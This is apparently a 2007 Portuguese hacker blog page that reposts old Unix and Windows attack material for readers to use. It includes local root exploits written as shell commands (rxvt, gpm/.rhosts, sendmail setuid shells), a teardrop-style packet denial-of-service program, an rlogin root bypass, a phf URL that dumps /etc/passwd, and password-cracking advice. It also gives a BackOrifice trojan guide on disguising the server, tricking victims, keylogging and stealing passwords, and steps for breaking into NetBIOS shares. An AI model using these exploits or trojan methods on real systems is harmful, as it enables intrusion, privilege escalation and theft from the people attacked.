HaHacker®

News HaHacker!

Olá!

Aqui no HaHacker Nos Ofereçemos Programas Hacker

De Primeira , Derrepente Vc ta Procurando um Arquivo

Aqui vc Encontra!

Espero que Goste Do Site mais antes Leia abaixo Com Atenção!

ATENÇÃO!

Invasao eh crime Aconselhamos Você a Nao Praticar Esse Ato Porque pode acabar sendo Punido Por LEI!
E Nosso Site Nao Se Responsabiliza Pelos Seus Atos!

Obrigado!

Duvida? add O Meu MSN! Se Estiver Ao Meu Alcançe o Seu Problema Te Ajudo!

morcegao_llyncoln@hotmail.com

Se Nao Quiser Add Mande-nos um E-mail!
Sem Anexo de Software Apenas de Imagem

Nossa Comunidade No Orkut Entre e Desfrute de Dicas E Muito +

http://www.orkut.com/Community.aspx?cmm=34572409

Grato!

sexta-feira, 23 de novembro de 2007

Exploits

Exploits

Tá aí uma porrada de EXPLOITS, tem alguns caras me
perguntando o porque eu coloco tanto exploit se eles não
prestam para nada????

Bom se não prestassem nao estariam aqui........ tem coisa que eu
editei que você não acha em lugar nenhum do mundo gente se liga
e vamos ver se vocês aprendem um pouco e colocam coisa que presta
na cuca de vocês....... Nesta edição vai ter só algums exploits
vai depender tudo da quantia que eu pegar por aí nestes tempos ou
do que eu deva ou não colocar no zine afinal eu coloquei muita
coisa aqui que vc's não deram o mínimo valor ....

Antes de virem falando merda pra mim tipo, "CARA NÃO EXISTE
EXPLOIT PARA WINDOWS 95, MANDA AI, O LINUX É MUITO RUIM EU TINHA
MAS NAO CONSSEGUIA HACKEAR OS MACROS DE WORD COM ELE ME AJUDA"

Olha bem antes de vim falar estas merdas pra mim ok[]'Z...

EXPLOIT LINK ------->> http://www.rootshell.com

Esta NOTA ‚ para quem programa: seria muito interessante se um
programa qualquer fizesse o box do shell e mandasse o sistema
remoto compilar o EXPLOIT deste modo o prog roda o EXPLOIT para
você as lamahs não reclamariam que não consseguem usar.....

Se você conseguir fazer qualquer coisa parecida e-mail em mim....

rxvt para Linux Slackware 3.0, RedHat 2.1, ele te da o ROOT
Autor: Dave M. (put[]'Z ete cara de novo)

Exploitando:

1. Logue em um sistema qualquer que você tenha um account.

2. Digite no Shell:
$ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
$ chmod +x /tmp/rxbug
$ rxvt -print-pipe /tmp/rxbug
3. No rxvt xclient:
$ cat
ESC[5i
ESC[4i

4. $ /tmp/rxsh
# whoami
root
#

------------------------------------------------------------------------------

O problema do KILL MOUSE/STARTMOUSE, este comando esta na parte
dos pacotes DOOM em sistemas LINUX, ‚ só rodar estes dois scripts.

----------------------------------startmouse.sh

/usr/games/doom/startmouse.sh:
#!/bin/sh
if [ -r /tmp/gpmkilled ]; then
/usr/bin/grep gpm /etc/rc.d/rc.local > /tmp/gpmscript
/bin/sh /tmp/gpmscript; /bin/rm /tmp/gpmscript /tmp/gpmkilled
fi

----------------------------------startmouse.sh

----------------------------------killmouse.sh

/usr/games/doom/killmouse.sh:
#!/bin/sh
if /bin/ps ax | /usr/bin/grep -v grep | /usr/bin/grep "gpm" ; then
GPM_RUNNING=true; /bin/killall gpm; /bin/touch /tmp/gpmkilled
fi

----------------------------------killmouse.sh

$ touch /tmp/gpmkilled
$ /usr/games/doom/startmouse

ps -aux | grep gpm
bo 1436 0.0 2.0 40 312 v03 R 16:33 0:00 grep gpm
root 1407 0.0 2.4 42 368 ? S 16:24 0:00 /usr/bin/gpm t ms


$ umask 0
$ ln -s /root/.rhosts /tmp/gpmkilled
$ /usr/games/doom/killmouse
1407 ? S 0:00 gpm t ms

$ ls -l /root/.rhosts
-rw-rw-rw- 1 root users 0 Dec 13 16:44 /root/.rhosts

$ echo localhost bo > /root/.rhosts
$ rsh -l root localhost sh -i
bash#

------------------------------------------------------------------------------

Jaeger, abre a porta do cliente, sistema FBSD, ultrix e linux
by jaeger (jaeger@dhp.com)

begin prservice.c

------------------Corte aqui

/* modified by jaeger 12Nov1996. Duplicated slack coding style.



now takes

port locuser remuser [cmd]

port remuser passwd [cmd]

where port is the dst port you wish the stderr socket to connect to

from the server to the client machine.



/* generate ^@string1^@string2^@cmd^@ input to netcat, for scripting up

rsh/rexec attacks. Needs to be a prog because shells strip out nulls.



args:

locuser remuser [cmd]

remuser passwd [cmd]



cmd defaults to "pwd".



... whatever. _H*/



#include



/* change if you like; "id" is a good one for figuring out if you won too */

static char cmd[] = "pwd";



static char buf [256];



main(argc, argv)

int argc;

char * argv[];

{

register int x;

register int y = 0;

char * p;

char * q;



p = buf;

memset (buf, 0, 256);



if (! argv[1])

goto wrong;

x = strlen (argv[1]);

memcpy (p, argv[1], x); /* port plus null */

x++;

p += x;

y += x;



if (! argv[2])

goto wrong;

x = strlen (argv[2]);

memcpy (p, argv[2], x); /* second arg plus null */

x++;

p += x;

y += x;



if (! argv[3])

---------------------Corte aqui

------------------------------------------------------------------------------

Usuário pode pegar o passwd, sistema linux
by Zygo Blacell (zblaxell@MIRANDA.UWATERLOO.CA)

Em um diretório onde você possa escrever, entre nele e edita um
arquivo unlinkavel. O problema esta em lpr(1)não olhe os
diretorios com (eg. /tmp)

[ patch deleted]

D'oh! It doesn't. :(

Patheie o script e zaz daqui algums dias volte l e de um lpr-s

mkdir /tmp/foobar
ln -s /etc/passwd /tmp/foobar
lpr big_huge_file
lpr -r /tmp/foobar/passwd

rm -rf /tmp/foobar ; ln -s /etc /tmp/foobar

OU

ln -fs /home/private_file /tmp/foobar/passwd # Does this work?

/etc/passwd goes away.

------------------------------------------------------------------------------

Usuário loga como ROOT, sistema linux
by Ken Weaverling (weave@hopi.dtcc.edu)

Em alguns sistemas antigos de Linux existem um bug muito escroto,
onde ‚ so colocao alguns sinais que vc loga como ROOT...

No sistema Slackware 2.3/ kernel 1.2.13. ‚ só digitar quando vc
for logar pelo telnet...

'+::0:0:::'

Sacou ‚ isto mesmo ‚ s¢ digitar no password '+::0:0:::'

------------------------------------------------------------------------------

Rlogin, usuário loga como ROOT, sistema AIX e
Linux (Slackware 3.1, Redhat 2.0-2.1) autor desconhecido bug
retirado da ROOTSHELL

:
% rlogin haxored.net -l -froot
#

------------------------------------------------------------------------------

ip_fragment.c, não sei o que faz ainda não testei, sistema
Linux 2.0.33 remandado por Michal Zalewski


----------------------ip_fragment.c

if(len>65535)
{
- printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr));
+ NETDEBUG(printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr)));
ip_statistics.IpReasmFails++;
ip_free(qp);
return NULL;

-------------------------------------------------------------------------

// overdrop by lcamtuf [Linux 2.0.33 printk abuse]
// ------------------------------------------------
// based on (reaped from) teardrop by route|daemon9

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define IP_MF 0x2000
#define IPH 0x14
#define UDPH 0x8
#define PADDING 0x1c
#define MAGIC 0x3
#define COUNT 0xBEEF
#define FRAG2 0xFFFF

void usage(char *name) {
fprintf(stderr,"%s dst_ip [ -n how_many ] [ -s src_ip ] [ -x ] (use -x for express delivery).\n",name);
exit(0);
}

u_long name_resolve(char *host_name) {
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr=inet_addr(host_name))==-1) {
if (!(host_ent=gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr,(char *)&addr.s_addr,host_ent->h_length);
}
return (addr.s_addr);
}


void send_frags(int sock,u_long src_ip,u_long dst_ip,u_short src_prt,u_short dst_prt) {
u_char *packet=NULL,*p_ptr=NULL;
u_char byte;
struct sockaddr_in sin;
sin.sin_family=AF_INET;
sin.sin_port=src_prt;
sin.sin_addr.s_addr=dst_ip;
packet=(u_char *)malloc(IPH+UDPH+PADDING);
p_ptr=packet;
bzero((u_char *)p_ptr,IPH+UDPH+PADDING);
byte=0x45;
memcpy(p_ptr,&byte,sizeof(u_char));
p_ptr+=2;
*((u_short *)p_ptr)=htons(IPH+UDPH+PADDING);
p_ptr+=2;
*((u_short *)p_ptr)=htons(242);
p_ptr+=2;
*((u_short *)p_ptr)|=htons(IP_MF);
p_ptr+=2;
*((u_short *)p_ptr)=0x40;
byte=IPPROTO_UDP;
memcpy(p_ptr+1,&byte,sizeof(u_char));
p_ptr+=4;
*((u_long *)p_ptr)=src_ip;
p_ptr+=4;
*((u_long *)p_ptr)=dst_ip;
p_ptr+=4;
*((u_short *)p_ptr)=htons(src_prt);
p_ptr+=2;
*((u_short *)p_ptr)=htons(dst_prt);
p_ptr+=2;
*((u_short *)p_ptr)=htons(8+PADDING);
if (sendto(sock,packet,IPH+UDPH+PADDING,0,(struct sockaddr *)&sin,
sizeof(struct sockaddr))==-1) {
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr=&packet[2];
*((u_short *)p_ptr)=htons(IPH+MAGIC+1);
p_ptr+=4;
*((u_short *)p_ptr)=htons(FRAG2);
if (sendto(sock,packet,IPH+MAGIC+1,0,(struct sockaddr *)&sin,
sizeof(struct sockaddr))==-1) {
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}


int main(int argc, char **argv) {
int one=1,count=0,i,rip_sock,lag=500;
u_long src_ip=0,dst_ip=0;
u_short src_prt=0,dst_prt=0;
struct in_addr addr;
fprintf(stderr,"overdrop by lcamtuf [based on teardrop by route|daemon9]\n\n");
if((rip_sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) {
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one))<0) {
perror("IP_HDRINCL");
exit(1);
}
if (argc < 2) usage(argv[0]);
if (!(dst_ip=name_resolve(argv[1]))) {
fprintf(stderr,"Can't resolve destination address.\n");
exit(1);
}
while ((i=getopt(argc,argv,"s:n:x"))!=EOF) {
switch (i) {
case 'n':
count = atoi(optarg);
break;
case 's':
if (!(src_ip=name_resolve(optarg))) {
fprintf(stderr,"Can't resolve source address.\n");
exit(1);
}
break;
case 'x':
lag=0;
break;
default:
usage(argv[0]);
break;
}
}
srandom((unsigned)(time((time_t)0)));
if (!count) count=COUNT;
fprintf(stderr,"Sending oversized packets:\nFrom: ");
if (!src_ip) fprintf(stderr," (random)"); else {
addr.s_addr = src_ip;
fprintf(stderr,"%15s",inet_ntoa(addr));
}
addr.s_addr = dst_ip;
fprintf(stderr,"\n To: %15s\n",inet_ntoa(addr));
fprintf(stderr," Amt: %5d\n",count);
fprintf(stderr,"[ ");
for (i=0;i<><><><><><><><><><><><><>

Invadindo BackOrifice

BackOriffice Parte I - O Que é o BackOrifice Parte II - Arquivos Parte III - Encontrando Vítimas Parte IV - Infectando novas vítimas Parte V - Comandos - Bogui.exe Parte VI - Comandos - Boclient.exe Parte VII - Protegendo-se Parte VIII - Desinfectando sua máquina Parte IX - Download - BackOrifice & Aplicativos : 1. O QUE É O BACKORIFICE : O BO é um Trojah (Cavalo de Troia) que foi apresentado em Agosto de 1998 no Defcon, um encontro de especialistas de segurança e hackers, o programa foi feito pelo grupo hacker "Cult of Dead Cult" (Culto à Vaca Morta) e funciona da seguinte maneira: o arquivo servidor (nome original Boserv.exe, mas que pode ser renomeado livremente e tem 124.928 bytes) é executado em sua máquina, do outro lado um usuário usando o arquivo bogui.exe conecta-se a sua máquina usando apenas seu numero de IP sem que você saiba e a partir daí faz o que quiser, envia messageBox, transforma sua máquina em um servidor Web onde a página principal são as unidades de disco fixo que você tem, apaga, copia e envia arquivos, reboota sua máquina, copia suas senhas, e inumeras outras possibilidades de ataque que iremos ver aqui. Índice 1.1 ARQUIVOS : boserv.exe : É o servidor, este arquivo você deverá renomear, alterar o ícone e enviar para a possível vítima que deverá instala-lo para que você possa invadir. bogui.exe : É o cliente de onde você irá comandar o micro invadido. boclient.exe : É o cliente em modo texto. freeze.exe : Comprime arquivos. melt.exe : Descomprime arquivos que foram comprimidos com o freeze.exe. Índice 1.2 ENCONTRANDO VÍTIMAS : Você pode procurar vítimas por provedores inteiros usando os primeiros números do IP do provedor com a última sequencia sendo sbustituída por um asterisco, como por exemplo, num provedor onde o IP primário é 255.255.255.1 você usa o comando: sweep 255.255.255.* Você também pode usar o mesmo artifício no Bogui.exe, coloque o mesmo número 255.255.255.* no campo destinado ao IP, escolha a opção Ping Host e clique em send, os IPs que respoderem ao ping estão infectados. Uma outra maneira e usar o velho e conhecido PortScan, scaneie a porta 31337, caso isso retorne alguma resposta a máquina em questão está infectada. Índice 1.3 INFECTANDO SUAS VÍTIMAS : Para infectar sua vítima basta fazer com que ela execute o boserv.exe, caso a vítima já esteja contaminada com NetBus ou algo parecido envie para a máquina dela o Boserv.exe e execute através do próprio NetBus, caso seja a primeira contaminação renomeie o arquivo e troque seu ícone através do MicroAngelo e tente enviar amigavelment através de um endereço de e-mail falso, ou por algum Chat, entrando com outro nick e fazendo amizade, depois que tiver ganhando a confiança da vítima é só enviar, você pode também zipar um programa que a pessoa esteja pedindo junto com o boserv.exe renomeado e com outro ícone, ou coloca-lo para download numa falsa home-page temporária que você pode criar apenas com intuito de infectar determinada pessoa informando depois o endereço da página dizendo tratar-se de um novo nuke, uma proteção ou algo assim. A Vítima descobrirá que se trata do Boserv: Se a vítima já conhecer o BO irá perceber que se trata do Boserv ao executar o arquivo que irá sumir, ou caso verifique antes o tamanho do arquivo, ou se estiver com uma versão dos mais novos Antivírus sendo rodada ao executar o arquivo, não é qualquer um que vai cair nessa não... Índice 2. COMANDOS - BOGUI.EXE : Abrindo o Bogui.exe você terá os campos TARGET-HOST:PORT que é onde será colocado o IP da vítima e porta, a porta você pode deixar o valor inicial 31337. Na combobox denominada COMMAND você tem a lista de comandos possíveis, o botão SEND envia o comando e EXIT fecha o programa. Os dois campos logo abaixo só serão usados em alguns comandos e irão variar de função, a janela maior é como se fosse seu status, na parte inferior os botões clear, copy e servem respectivamente para limpar e copiar um trecho selecionado do status, você pode logar tudo que está fazendo marcando o Checkbutton LOG TO FILE e especificando logo abaixo o nome do arquivo de log. Directory create : Cria um diretório, escolha a opção Directory create e escreva no campo UNUSED (esquerdo) o nome e caminho do diretório a ser criado, caso você não especifique o caminho o diretório será criado onde foi instalado o servidor BO. Clique em Send Directory list : Lista diretórios, escolha a opção Directory list, escreva em Directory Location o caminho do diretório. Clique em Send Directory remove : Remove diretório do mesmo modo que se cria em Directory Create. Escolha a opção Directory remove escreva o caminho do diretório no campo UNUSED (da esquerda) e clique em Send. File Copy : Copia arquivos, escolha esta opção, escreva o nome e caminho do arquivo a ser copiado em SOURCE FILENAME e o nome e caminho da cópia em TARGET FILENAME clique em Send. File delete : Deleta Arquivos, escreva no campo FILENAME o caminho e nome do arquivo a ser deletado e clique em SEND, não abuse desta opção. File find : Localiza arquivos, escreva em FILE MASK o nome do arquivo a ser procurado, e em SEARCH PATH ROOT o path onde procurar (geralmente use C:\) File view : Visualiza arquivos de texto, escreva em FILENAME o caminho e nome do arquivo a ser visualizado, clique em SEND e o arquivo será visualizado na janela de status (a janela maior do bogui) HTTP Disable : Desativa o servidor Web que é ativado pelo próprio BO no comando HTTP Enable. HTTP Enable : Transforma a máquina atacada em um servidor Web, escolha a opção HTTP Enable, ponha em PORT a porta (use 80), e em Root coloque o diretório que servirá como página inicial (deixe em branco e tenha acesso aos drivers de disco fixos).Depois clique em Send, no seu browser coloque o endereço: http://127.0.0.1:90 onde 127.0.0.1 deve ser substituído pelo IP da vítima, e 90 pela porta, caso você tenha deixado o valor da porta como 80 não só será necessário o IP. depois é só navegar normalmente, fazendo downloads e Uploads através do botão UpLoad file pelo seu Browser. Keylog Begin : Começa a logar tudo que a vítima digitar em um arquivo que você deve especificar o nome e o caminho no campo LOG FILENAME. Keylog End : Para de logar. MM Capture screen : Captura a tela da vítima (como o Print screen), escolha esta opção, escreva em BITMAP FILENAME o nome do arquivo .bmp a ser gravado com a tela da vítima, clique em Send. MM Play sound : Toca na máquina invadida um som WAV existente no HD, escreva o nome e caminho do arquivo a ser tocado em WAVE FILENAME. MM Ping host : Dá um ping na máquina infectada na porta do BO, o ping só é respondido se a máquina realmente estiver infectada, usado para descobrir máquinas infectadas. Use asteriscos para dar Ping em provedores inteiros e achar pessoas contaminadas. System Dialogbox : Envia uma MessageBox (cixa de mensagem) á vítima, escreva em TEXTO o texto da mensagem, e em TITLE coloque o título. System Info : Recolhe informações sobre o sistema, usuário, processador, sistema operacional, quantidade de memoria disponível e em uso, unidades de disco fixo, espaço utilizado no HD e espaço livre, etc. Escolha a opção system Info e clique em SEND System lockup : Trava totalmente (congela) o sistema da vítima. escolha a opção system lockup e clique em SEND. System passwords : Te dá todas as senhas gravadas da vítima, escolha a opção System Passwords, clique em SENd e as senhas serão mostradas na janela maior. System reboot : Reboota o sistema, apenas escolha esta opção e clique em send. Índice 2.1 COMANDOS - BOCLIENT.EXE : BO Commands : host : Se conecta ao IP especificado, o IP ao qual você estiver conectado aparecerá no prompt ping : Pinga o IP ao qual você está conectado. sweep : Rastreia todos IPs um provedor em busca de pessoas infectadas, ex.: para procurar pessoas infectadas no provedor cujo IP é 255.255.255.1 escreva sweep 255.255.255.* status : Mostra o status da sua conexão, Host ao qual está conectado, porta, diretório corrente. File Commands : Totalmente iguais ao do DOS dir : Lista arquivos no diretório corrente do computador ao qual você está conectado. del : Deleta um arquivos, digite: del c:\diretorio\nome-do-arquivo-a-ser-deletado.ext copy : Copia arquivos, digite: copy c:\diretorio\arquivo-a-ser-copiado.ext c:\outroiretorio\copia.ext ren : Renomeia arquivos, digite: ren nome-do-arquivo.ext novo-nome.ext find : Localiza arquivos, digite: find C:\diretorio\arquivo.ext freeze : Comprime arquivos, digite: freeze arquivo.ext arquivo-comprimido.ext melt : Descomprime arquivos, digite: melt arquivo-comprimido.ext arquivo.ext view : Visualiza arquivos, digite: view c:\diretorio\arquivo.txt Directory Comands : Também iguais ao DOS cd : Entra em um diretório, digite: cd windows rd : Remove um diretório, digite: rd c:\windows md : Cria um diretório, digite: md c:\novo-diretorio System Commands: info : Recolhe informações sobre o sistema, usuário, processador, sistema operacional, quantidade de memoria disponível e em uso, unidades de disco fixo, espaço utilizado no HD e espaço livre, etc. Digite: info passes : Mostra todas as senhas gravadas da vítima, digite: passes dialog : Envia uma MessageBox, digite: dialog "Mensagem" "Título" keylog : Loga em um arquivo especificado por você tudo que for escrito pela vítima, digite: keylog c:\diretório\arquivo-de-log.log keylog stop : Para de logar o que a vítima escreve, digite: keylog off reboot : Reinicia a máquina da vítima, digite: reboot httpon : Transforma em um servidor http o computador da vítima, digite: httpon 80 C:\ onde 80 é a porta e C:\ será a "página inicial" depois basta abrir em seu browser o ip da vítima antecepdido de http:// httpoff : Desativa o servidor http, digite: httpoff lockup : Trava totalmente a máquina da vítima, digite: lockup capscreen : Captura a tela, digite: capscreen c:\diretório\tela.bmp sound : Toca na máquina da vítima uma WAV, digite: sound c:\windows\media\arquivo.wav Índice 3. PROTEGENDO-SE : Atualmente os antivírus mais novos como por exemplo o VírusSCan v4.0.1 além de detectar e remover vírus também já detectam e até removem algunss Trojahs como BO, tenha sempre o antivírus mais recente instalado em sua máquina e mantenha-o ativo durante suas navegações pela web. Você deve também sempre que notar algo estranho e desconfiar de atitudes estranhas e involuntárias de sua máquina abrir o prompt do DOS e digitar o seguinte comando: netstat -an | find 31337 Se a resposta não demonstrar nada de anormal tudo bem, mas se a resposta for algo parecido com: TCP : 31337 LISTENING Sinal de que o dono do IP que aparece no lugar de está em sua máquina pelo BO, livre-se dele pelos provessos ensinados aqui. Índice 3.1 DESINFECTANDO SUA MÁQUINA : Clique no menu Iniciar (Start) vá até EXECUTAR(Run), escreva Regedit e clique em Ok, isso irá abrir o editor de registros do windows, entre em Hkey_Local_Machine\Software\Microsoft\Windows\CurrentVersion e verifique dentro de Run, RunServices, RunOnce, RunServicesOnce, qualquer caminho que leve para algo como " .exe" "exe~1.exe" ou algo desse tipo com nomes bem esquisitos clique com o botão direito e clique em Apagar tendo muito cuidado com o que faz, pois caso ocê delete uma chave essencial ao sistema pode ocorrer um sério problema com seu rWindows. Outro passo é Procurar pelos arquivos "windll.dll" e " .exe" que no DOS aparece com o nome "exe~1" geralmente e

Invasao por IP. (Num.1)

AVISO: NÃO ME RESPONSABILIZO POR OS ATOS QUE VOCÊ VENHA A COMETER EM VIRTUDE DESSE TEXTO... Para você invadir por esse método o seu computador e o da pessoa ou empresa que você quer invadir terão que estar compartilhados...ai você me pergunta como compartilho meu computador? E eu respondo vá em painel de controle e depois em rede, coloque o Cd do Windows do seu driver, clique em adicionar, escolha a opção protocolo, e depois vá em Microsoft e adicione o protocolo NETBUI clique em ok, feito isso você terá adicionado o protocolo de invasão mas seu computador ainda não está compartilhado, depois de Ter adicionado o protocolo NETBUI reinicie sua máquina. Quando iniciar o Windows novamente vá em painel de controle rede e clique em "Compartilhamento de impressão e arquivos" escolha a opção completo não escolha nunca somente leitura, vá em meu computador clique com o botão direito em cima de c: e acione compartilhamento se aparecer uma mão azul no seu driver c: seu computador já está compartilhado! Hehe agora é só invadir O 1o passo é pegar o ip do indivíduo não me pergunte como te vira vê se faz amenos isso sozinho.. Depois de Ter pego o ip da pessoa o próximo passo é no prompt do dos você digitar nbtstat –A e o ip. ex: nbtstat –A 200.253.240.13 isso vai lhe dizer o nome do computador da pessoa mas lembre que nesse comendo o –A tem que ser maiúsculo. Digamos que depois de eu Ter digitado nbtstat –A 200.253.240.13 deu que o nome do computador da pessoa é AMPERES ei eu pego e digito edit LHMHOSTS vai abrir uma tela de edit. Ai você coloca o ip da pessoa seguido do nome do computador. exemplo que estou dando ia ficar 200.253.240.13 AMPERES salve o edit arquivo e depois salvar. Novamente no prompt digite agora com o a minúsculo nbtstat –a AMPERES(NOME DO COMPUTADOR A SER INVADIRDO) se ele achar o host da pessoa deixe o prompt aberto e vé no menu iniciar localizar computador quando abrir a tela de procura você coloca o nome do pc do cara com letras maiúsculas se aparecer um computador você deve dar um clique duplo nele e pronto você já está hackeando o pc do indivíduo.

Invasao por IP (Num.2)

NVASÃO POR IP (2) OBS: Com este texto, você pode não cosneguir invadir um computador via Internet. Porém, você pode acabr conseguindo invadir HPs que são controladas por WIndows NT, o que eu considero uma ótissísima coisa... :-) Invasão porIP Text by ShUtDoWn & Snoopy_ Texto formato MS-DOS Este eh o melhor e o mais objetivo texto de invasao por IP na Internet. Inicio 1.þ Va ao painel de controles e de 2 cliques em "Rede". 2.þ De 2 cliques em "TCP/IP"e va para "Configuracao WINS". 3.þ Clique em Ativar resolucao WINS"e coloque como Servidor WINS primario: 204.118.34.6 , e como Servidor WINS secundario: 204.118.34.11 e clique OK" 4.þ Verifique antes, se vocˆ possui os drivers clientes para redes Microsoft. Caso nao estejam instalados, instale-os atrav‚s do Painel de Controle, no ¡cone Redes e clique no botao "Adicionar..." 5.þ Clique no botao : "Compartilhamento de impressao e arquivos..."e ative a opcao: "Desejo que outros usuarios tenha, acesso a meus arquivos", e clique OK e OK. 6.þ Reinicialize seu computador. 7.þ Conecte-se a InterNet. 8.þ Va ao Prompt do MS-DOS. 9.þ Digite: NBTSTAT -N, se aparecer "No names in cache", digite: NETDDE, e digite novamente: NBTSTAT -N, a¡ vai aparecer o seu IP com seu NETBIOS. 10.þ Crie um arquivo chamado LMHOSTS (sem extencao nenhuma e no diretorio do Windows 95), e nele voce coloca o IP do computador que quer invadir e separado por um espaco, o NetBios do mesmo. ( para achar o NetBios, voce digita : NBTSTAT -A ("IP") ) Obs: o "A" do -A tem que ser maiusculo. 11.þ Depois de ter criado o LMHOSTS com o IP e o NetBios, vocˆ digita : NBTSTAT -a ("NetBios") Obs.: O "a" do -a tem que ser minusculo. 12.þ Depois disso, saia do Prompt do MS-DOS, clique no Menu INICIAR, LOCALIZAR , COMPUTADOR... 13.þ Coloque o NetBios de quem deseja invadir e clique : "Localizar Agora". 14.þ Selecione o Computador achado, va no Menu "ARQUIVO", clique em "ABRIR" depois disso, vai aparecer uma janela igual do Explorer ( gerenciador de pro- gramas ) com todos o arquivos, diret¢rios e sub-diret¢rios do computador do "Cobaia". ºQualquer duvida procure o Snoopy_ no IRC, geralmente nos canais #ribeirao ºe #+qd+ ou... ºe-mail: follybbs@hotmail.com º Este e um texto by Snoopy_ & ShUtDoWn. PS: Manera com seu "AMIGUINHO", vai !?!! ;) Faq 1.þ Com este texto eu posso invadir uma provedora de Internet ? Claro, mas apenas as provedoras q usam NT e os krinha das provedoras colocam senhas de acesso, se vc tiver a senha beleza ! 2.þ Se eu invadir o caomputador de alguem, eu posso apagar arquivos, programas e ... ? Pode sim, se vc invadiu o computador do "Cobaia" vc tem acesso geral fazendo o que vc bem entender. 22:19:10: Adaptador de Dial-Up..[0000][Ref# 15] Connection Attempt: src=200.210.52.130, dst=200.246.35.25, sport=1036, dport=139. Build Your Free Home PageVisit other great pages on:Business & Money>Business & MoneySmall BusinessSmall Business

Hack Remoto!

Hack Remoto
Pegando o Password por FTP: Bem, uma das maneiras mais fáceis de adquirir acesso de super usuário é entrando anonimo por ftp em uma página. Mas primeiro, você precisa aprender uma coisa sobre o arquivo de passwords root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:bin/csh BBob:EUyd5XAAtv2dA:112920":Billy Bob:/usr/people/bbob:bin/csh Este é um exemplo de de uma forma encriptada do arquivo de password. root:x:0:1:Superuser:/: ftp:x:202:102:Anonymous ftp:/u1/ftp ftpadmin:x:203:102:ftp Administrator:u1:ftp Este é um outro exemplos de um arquivo de password, só que este tem uma pequena diferença, ele é mais simples. Este tipo, não deixa você ver nem copiar o atual password encriptado. Isto causa problemas para o cracker e criador de dicionário(ambos esplicados depois no texto). Abaixo, esta outro exemplo de um arquivo de password: root:x:0:1:0000-Admin(0000):/:/usr/bin/csh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false Estes tipos de arquivos, tem um "x" no lugar do password, ou as vezes é disfraçado de *. Agora que você sabe um pouco mais sobre o arquivo de password, você está apto para diferenciar um pass encripatdo normalmente e o "sombreado". Vamos agora caminhar para saber como crackear isso. Crackear um password não é complicado se você olhar bem, os arquivos, variam de sistema para sistema. 1. O primeiro passo a fazer, é copiar ou pegar o arquivo. 2. O segundo é procurar um Cracker e um gerador de palavras. Contudo isso é aproximadamente impossível de achar um bom cracker por que existem poucos. Eu recomendo Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Agora, procurar por um gerador de palavras... Quando você começa a crackear um programa, você vai se perguntar para achar o password. É aí que o gerador de palavras entra. você pode fazer o download em aproximadamente TODAS as página hacker da Internet(Páginas AMERICANAS). O gerador de palavras procura por TODAS as combinações de letras que você escolher(ASCii, caps, números, etc...). 3. Você então executa o cracker e indica as direcões que ele te dá. A técnica PHF A técnica phf é o mais fácil caminho para se pegar um password(contudo não funciona em 95% das vezes). Mas para realizar a phf tudo que você precisa fazer é abrir o seu broswe e colocar o seguinte endereço: http://página_fica_aqui/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Você vai subistituir o página_fica_aqui pelo domínio da página. Então, se você quer pegar o password de www.pagina.com você colocaria: http://www.pagina.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Você precisa apenas sentar e copiar o arquivo.(se funcionar né. :P) Telnet e Exploits Bem, exploits são os melhores caminhos para hackear páginas da web, mas é muito mais complicado que Entrar por FTP e a técnica phf. Mas antes, você precisa configurar um exploit, você precisa ter um programa de telnet, existem muitos tipos de clientes, você pode procurá-lo e encontrá-lo em qualquer página de busca. Isto é melhor para pegar a conta da sua vítima(se possível). Exploits mostram erros ou bugs no sistema e normalmente avisa você para pegar a senha de root. Existem muitos exploits diferentes, e você pode ver separadamente. Eu vou listar alguns, mas existem infinitos exploits. Este exploit é agora um "Enviador de Mensagem" v.8.8.4 Ele cria um programa /tmp/x que fala shell como root. Abaixo, como faze-lo. cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi e agora vamos para outro exploit.eu agora vou mostrar um exploit pine atravéz do linux. Para ver o processo com ps, para ver que usuário esta rodando o PINE, um pode dar um ls no /tmp/ para pegar os nomes do lockfile para cada usuário. Olhando o procsso novamente você verá quando cada usuário sair PINE ou sair das mensagens não lidas no INBOX, efetivamente deletando o respectivo lockfile. Criando um link 